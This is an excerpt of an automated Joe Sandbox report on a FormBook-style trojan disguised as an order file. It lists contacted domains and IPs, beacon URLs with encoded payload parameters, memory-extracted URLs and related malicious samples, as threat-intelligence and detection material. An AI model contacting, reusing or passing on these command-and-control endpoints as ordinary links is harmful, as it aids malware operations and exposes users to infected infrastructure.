https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/	0%	Avira URL Cloud	safe
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.helpers-lion.online/mooq/	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sandranoll.com	213.145.228.16	true	false	11%, Virustotal, Browse	unknown
www.dmtxwuatbz.cc	104.21.45.56	true	false	2%, Virustotal, Browse	unknown
www.xn--matfrmn-jxa4m.se	194.9.94.85	true	false	0%, Virustotal, Browse	unknown
www.catherineviskadi.com	217.160.0.106	true	false	1%, Virustotal, Browse	unknown
www.anuts.top	23.251.54.212	true	false	7%, Virustotal, Browse	unknown
www.helpers-lion.online	194.58.112.174	true	false	0%, Virustotal, Browse	unknown
www.bfiworkerscomp.com	208.91.197.27	true	false	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	0%, Virustotal, Browse	unknown
www.telwisey.info	199.192.19.19	true	false	2%, Virustotal, Browse	unknown
www.hprlz.cz	5.44.111.162	true	false	1%, Virustotal, Browse	unknown
www.xn--fhq1c541j0zr.com	43.252.167.188	true	false	0%, Virustotal, Browse	unknown
www.fourgrouw.cfd	unknown	unknown	true		unknown
www.hatercoin.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tinmapco.com	unknown	unknown	true		unknown
www.gipsytroya.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bfiworkerscomp.com/xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h	false	Avira URL Cloud: malware	unknown
http://www.xn--fhq1c541j0zr.com/rm91/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gipsytroya.com/tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h	false	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/	false	Avira URL Cloud: safe	unknown
http://www.xn--fhq1c541j0zr.com/rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/	true	Avira URL Cloud: malware	unknown
http://www.gipsytroya.com/tf44/	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/	false	Avira URL Cloud: malware	unknown
http://www.telwisey.info/ei85/	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	true	Avira URL Cloud: malware	unknown
http://www.catherineviskadi.com/qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h	false	Avira URL Cloud: safe	unknown
http://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=	false	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=	false	Avira URL Cloud: safe	unknown
http://www.catherineviskadi.com/qe66/	false	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/	false	Avira URL Cloud: safe	unknown
http://www.helpers-lion.online/mooq/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dts.gnpge.com	QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reg.ru	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZY	clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/px.js?ch=2	clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/px.js?ch=1	clip.exe, 00000003.00000002.4134771184.000000000582C000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003CDC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH	clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH	clip.exe, 00000003.00000002.4134771184.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.0000000016C44000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png	clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif	clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	clip.exe, 00000003.00000002.4134771184.0000000006006000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000044B6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png	clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000003.00000002.4134771184.00000000064BC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.000000000496C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc	QAjjirwAoAEExvw.exe, 00000007.00000002.4135732258.0000000005746000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	clip.exe, 00000003.00000003.2060620422.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	clip.exe, 00000003.00000002.4136216155.0000000007610000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000005CE2000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004192000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png	clip.exe, 00000003.00000002.4134771184.0000000006198000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.0000000004648000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.251.54.212	www.anuts.top	United States	62468	VPSQUANUS	false
213.145.228.16	www.sandranoll.com	Austria	25575	DOMAINTECHNIKAT	false
104.21.45.56	www.dmtxwuatbz.cc	United States	13335	CLOUDFLARENETUS	false
194.9.94.85	www.xn--matfrmn-jxa4m.se	Sweden	39570	LOOPIASE	false
5.44.111.162	www.hprlz.cz	Germany	45031	PROVIDERBOXIPv4IPv6DUS1DE	false
217.160.0.106	www.catherineviskadi.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
208.91.197.27	www.bfiworkerscomp.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
194.58.112.174	www.helpers-lion.online	Russian Federation	197695	AS-REGRU	false
199.192.19.19	www.telwisey.info	United States	22612	NAMECHEAP-NETUS	false
43.252.167.188	www.xn--fhq1c541j0zr.com	Hong Kong	38277	CLINK-AS-APCommuniLinkInternetLimitedHK	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1491394
Start date and time:	2024-08-12 05:12:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MV Sunshine, ORDER.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@15/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 52 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QAjjirwAoAEExvw.exe, PID 2700 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:13:53	API Interceptor	12963172x Sleep call for process: clip.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.251.54.212	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/d5fo/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
	Arrival Notice.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.anuts.top/niik/
213.145.228.16	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	strg.or.at/wordpress/wp-login.php
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/zg5v/
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/cga5/
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sandranoll.com/4bud/
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
104.21.45.56	NEW ORDER-RFQ#10112023Q4.exe	Get hash	malicious	FormBook	Browse
